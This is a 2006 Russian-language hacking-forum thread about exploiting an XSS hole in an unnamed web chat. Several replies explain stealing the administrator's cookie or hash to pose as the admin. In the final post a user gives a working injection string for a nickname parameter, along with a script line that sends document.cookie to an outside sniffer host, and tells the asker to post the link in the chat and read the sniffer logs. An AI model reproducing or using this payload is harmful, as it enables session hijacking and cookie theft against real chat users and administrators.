ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вот нашел в чате. Можно ли с этим что-нить сделать?
  #1  
Старый 11.03.2006, 10:45
Аватар для gorevoin
gorevoin
Новичок
Регистрация: 28.01.2006
Сообщений: 4
Провел на форуме:
57827

Репутация: 0
Question Вот нашел в чате. Можно ли с этим что-нить сделать?

не актуально

Последний раз редактировалось gorevoin; 02.06.2008 в 06:01..
 
Ответить с цитированием

  #2  
Старый 11.03.2006, 11:49
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Цитата:
Уязвимость через XSS или CSS
А тебе не кажится что это одно итожа, нзвание XSS поставили потому что бы не путать Cascading Style Shit с Cross Site Scripting.

Ты правильно написал у себе в подписи : Учиться, учиться и еще раз учиться
 
Ответить с цитированием

  #3  
Старый 11.03.2006, 12:09
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

У тебя же есть скрипты уязвимостей... че тебе еще надо-то?=)

Цитата:
Shit
Кхе-кхе...=)))
 
Ответить с цитированием

  #4  
Старый 11.03.2006, 12:40
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

ДРОН ты непонел ))) ему нужна через xss,взять базу ))))))
 
Ответить с цитированием

  #5  
Старый 11.03.2006, 16:02
Аватар для Morph
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию

ну так пусть берет тока куки пусть получит.
 
Ответить с цитированием

  #6  
Старый 11.03.2006, 17:06
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Ты не правильно понел, он Xss путает с СГЛ запросом. Это мне так кажится.
 
Ответить с цитированием

  #7  
Старый 11.03.2006, 23:11
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

можна только хэш админа поймать
 
Ответить с цитированием

  #8  
Старый 12.03.2006, 18:55
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

это xss, с помощью неё можно попробовать забрать хэш админа
если получится его взять, то подставляешь данные админа за место своих, и по идее, если нет какой-нибудь навороченной защиты (по ip например), можно пабыть на некоторое время админом, а там уже как получится...
 
Ответить с цитированием

  #9  
Старый 12.03.2006, 22:16
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Вобщем, к примеру....
Цитата:
au_nick="><script>alert('wvs-xss-magic-string-2125609660')%3B</script>&nicks=1
В этой строке вместо
Цитата:
alert('wvs-xss-magic-string-2125609660')%3B
пишешь..что-то вроде
Цитата:
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
потом полученную строку кидаешь в чат и идешь смотреть логи сниффера... а потом.. уже описано, что потом.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Открытое письмо журналу "Хакер" TheFile Болталка 34 31.01.2009 21:03
Как восстановить нечитающийся Cd? novichok Аппаратное обеспечение 8 02.05.2007 12:15
химия своими руками silveran Болталка 43 11.01.2006 22:05
Пиянство mifan Болталка 18 03.09.2004 12:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ